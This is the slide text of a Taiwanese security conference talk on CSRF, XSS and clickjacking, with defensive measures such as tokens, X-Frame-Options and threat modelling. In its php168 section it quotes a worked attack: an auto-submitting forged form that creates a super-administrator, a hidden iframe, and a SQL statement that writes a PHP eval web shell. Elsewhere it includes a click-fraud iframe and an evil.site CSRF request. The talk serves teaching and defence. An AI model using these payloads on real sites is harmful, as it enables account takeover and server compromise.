TAIS台灣學術資訊安全國際研討會CSRF(跨站偽冒請求)攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigation 夏克強 麟瑞科技 資深技術顧問 CISSP, CHFI, CEH
Why Web application Vulnerable Web Servers Application Servers Database Servers Operating Systems Operating Systems Operating Systems Network Improved commercial or in-house application access to information means improved access for hackers? 75%攻擊集中於此 • 網站應用程式(Web AP) • 未上線的急於上線 • 已上線的年代久遠 SQL Injection Parameter Tampering XSS, .., etc. Database Servers Customer Info Business Data Transaction Info 個人資料 交易紀錄 客戶資料 網路 防火牆 IDS IPS
OWASP TOP TEN Mapping from 2007 to 2010 Top 10 = = + + - -
Cybercrime威脅 Cyber pickpocketing BEBLOH, where the malware went beyond “traditional” keylogging by not only stealing credit card information but also accessing the account and transferring funds to another account
Cross-Site Scripting Reflected XSS, Stored XSS (aka Persistent XSS) Samy Worm Web sites compromised: FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes Top vulnerable weakness in recent years Web sites vulnerable to XSS: searching page, forum, comment, login page.. Cross-Site Scriptingattacks Hoax Steal user’s session Id and cookies Almost full control to your browsers such as port scan, keylogger and send requests on behave of the client
Stored Cross-Site Scripting Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code 1 Attacker sets the trap – update my profile Application with stored XSS vulnerability Attacker enters a malicious script into a web page that stores the data on the server Victim views page – sees attacker profile 2 Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie
Stored & Reflected XSS Stored XSS(aka Persistent XSS) is more serious than reflected XSS • Reflected XSS must use some means of inducing users to visit attacker’s crafted URL • Phishing attack by offering a link to his own • malicious web server would be suspected as a scam • The requirement for stored XSS is avoided • Stored XSS guaranteed that victim users will be already accessing the application at the time that the attack strikes • Reflected XSS may try to engineer this situation • by persuading the user to log in
Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕 Clickjacking可視為是一種進階的網路釣魚手法 Clickjacking (Session-Riding)與CSRF 相似,都是讓使用者在 不自覺的狀況上當 Clickjacking與CSRF結合 對攻擊有加乘效果 Clickjacking(點擊綁架)
使用Firefox的Noscript的ClearClick功能 阻擋iframe的執行(NoScript)或停用Javascript Frame busting(也就是anti-framing) for your own sites <script>if (top != self) top.location = location</script> IE8 针對Clickjacking增加 對Clickjacking攻擊的防禦功能 X-FRAME-OPTIONS: DENY X-FRAME-OPTIONS: SAMEORIGIN Clickjacking防禦
Forced Browsing 應用: 廣告收入 技巧: 數以千計的人點擊, 來自不同IP地址, 可以規避檢查機制 <html> <body> 空白頁 <iframe src=http://www.google.com.tw/search?hl=zh-TW &q=taiwan+taipei height=0 width=0> </body> </html>
CSRFexample: 進一步 引誘你點選連結 假如你訪問的購物網站網址為: http://www.hacker.net,你購買了一個產品,購物網站參數為: http://www.hacker.net/buy.php?item=computer&quantity=1 這是一個正常的HTTP請求,商品名稱是電腦computer,購買數量是1,網站會將所買的商品與數量記錄在用戶的帳戶內。 如果黑客知道了http://www.hacker.net購物網站的操作流程,他就可以偽造一個類似的HTTP請求:http://www.hacker.net/buy.php?item=computer&quantity=1000,商品名稱是computer,而購買數量卻是1000。如果目標用戶在網站登錄期間不小心訪問了這個鏈接,那麼在他的帳戶內就是會有一條記錄是購買1000台的computer
php168之CSRF攻擊 加入網站管理員的頁面為: 摘錄自www.haik8.com
php168之CSRF攻擊 <form name="form1" method="post" action="index.php?lfj=member&action=addmember"> <tr class="head"> <td colspan="2">添加新用户</td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%">帐号:</td> <td width="63%"> <input type="text" name="postdb[username]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%">密码:</td> <td width="63%"> <input type="password" name="postdb[passwd]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%">重复密码:</td> <td width="63%"> <input type="password" name="postdb[passwd2]"> </td> </tr> <tr bgcolor="#FFFFFF"> 摘錄自www.haik8.com
php168之CSRF攻擊 <td width="37%">所属用户组:<span help=1>只有超级管理员与创建人才能添加新的超级管理员,只有超级管理员与创始人及前台管理员才能添加新的前台管理员</span></td> <td width="63%"> <select name='postdb[groupid]' ><option value='' selected>现有用户组</option> <option value='2' >游客组</option> <option value='3' >超级管理员</option> <option value='4' >前台管理员</option> <option value=''>--+以上是系统组,以下是会员组+--</option> <option value='8' >普通会员</option> <option value='9' >高级会员</option> </select> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%">邮箱:</td> <td width="63%"> <input type="text" name="postdb[email]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> </td> <td width="63%"> <input type="submit" name="Submit" value="提交"> </td> </tr> </form> 摘錄自www.haik8.com
php168之CSRF攻擊 駭客修改程式碼, 修改完的程式碼如下: <html> <body onload="document.form1.submit()"> <form name="form1" method="post" action=""> <input type="hidden" name="postdb[username]" value='樱花浪子'> <input type="hidden" name="postdb[passwd]" value='nohack'> <input type="hidden" name="postdb[passwd2]" value='nohack'> <select name='postdb[groupid]' ><option value='3' selected> </form> </body> </html> 摘錄自www.haik8.com
php168之CSRF攻擊 這樣我們得到路徑為:,這樣管理員在登錄前後台的情況下訪問了這個頁面就會添加一個用戶名為“櫻花浪子”、密碼為“nohack”的超級管理員 摘錄自www.haik8.com
php168之CSRF攻擊 但是這樣的話會顯示添加管理員成功的提示,我們要做的隱藏點,來做一個圖片木馬 <html> <body> <iframe src= width=0 height=0></iframe> <img src=/Article/UploadPic/2010-4/2010417144022600.jpg></img> </body> <html> 得到路徑為special/5_20090426220451_PYwLh.jpg, special/5_20090426220451_PYwLh.jpg 摘錄自www.haik8.com
php168之CSRF攻擊 執行:“SELECT ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:\ \AppServ\\www\\php168\\nohack.php’” 摘錄自www.haik8.com
php168之CSRF攻擊 檢查一下, 顯示已經注入了!! 摘錄自www.haik8.com
行事曆系統範例 http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308
CSRF, Referrer與X Headers範例 <a href=‘http://egw.ringline.com.tw/index.php?menuaction= calendar.calendar_uiviews.day&date=20101016>請點我可打折</a> Clickjacking與CSRF有加乘效果 使用iframe Opacity=30 強迫victim讀取行事曆特定日期 Countermeasures against CSRF
CSRF Preventions Insert custom random tokens into every form and URL Store a single token in the session and add it to all forms and links Hidden Field: <input name="token" value="687965fdfaew87agrde" type="hidden"/> Single use URL: /accounts/687965fdfaew87agrde Form Token: /accounts?auth=687965fdfaew87agrde … For sensitive data or value transactions, re-authenticate or use transaction signing Verify Referrer header, but XHR can break it. Verify X-header. It is more effective than Referrer header due to SOP. legal example: GET /auth/update_profile.cgi?email=victim@social.site HTTP/1.1 Host: social.site X-CSRF: 1 Illegal example: <html><img src=http://social.site/auth/update_profile.cgi?email=attacker@evil.site></html> GET /auth/update_profile.cgi?email=attacker@evil.site HTTP/1.1 Host: social.site Ensure that there are no XSS vulnerabilities in your application
Ratproxy Semi-auto web application security assessment tool for XSS, CRSF Not all of the issues reported necessarily correspond to actual security flaws Findings should be validated by manual testing and analysis where appropriate
Microsoft Threat Modeling Spoofing identity S T Elevation of privilege Tampering with data (integrity) E Damage potential Threats D Discoverability Reproducibility D R Denial of service D Repudiability R Rating Information disclosure I Affected users Exploitability A E
Microsoft Threat Modeling 1. Identify assets 2. Create an architecture overview 3. Decompose the application 4. Identify the threats 5. Document the threats 6. Rate the threats
Obstacle for Code Review(or Scanners) • Can’t provide immediate protection • Web applications, change frequently. In many cases the • application can change before a full review cycle has • been completed 1 • The source code is not readily “available” or “understood” • With enough MIS staffs and time to do re-coding ? 2 • Manual code fixes are only as good as the developer 3 • Attacks, (again, especially Web attacks), also change • frequently. • No multiple services correlation capability 4 • Can’t track the accurate user who launches the attacks • and the attack patterns 5
Continued • Suitable for developing phase, not for production phase • Suitable for developing phase, not for design phase • (only resolved by Risk Analysis) 6 • Slow response to compliance requirements 7 • Can’t protect web servers and backend database servers 8 • No web site cloaking such as anti Google hack 9 • Can’t provide additional insight into those that are requiring • writing to the database or are accessed by transaction only 10
Obstacle for WAFs • Suitable for production phase, not for developing phase 1 • Suitable for developing phase, not for design phase • (only resolved by Risk Analysis) 2 • Lack of Logical flaws detection (only resolved by human • code review) • Applications do something insecure 3 • Can’t accurately correct application flaws 4 • WAF could go down (fail-open or fail-close) 5
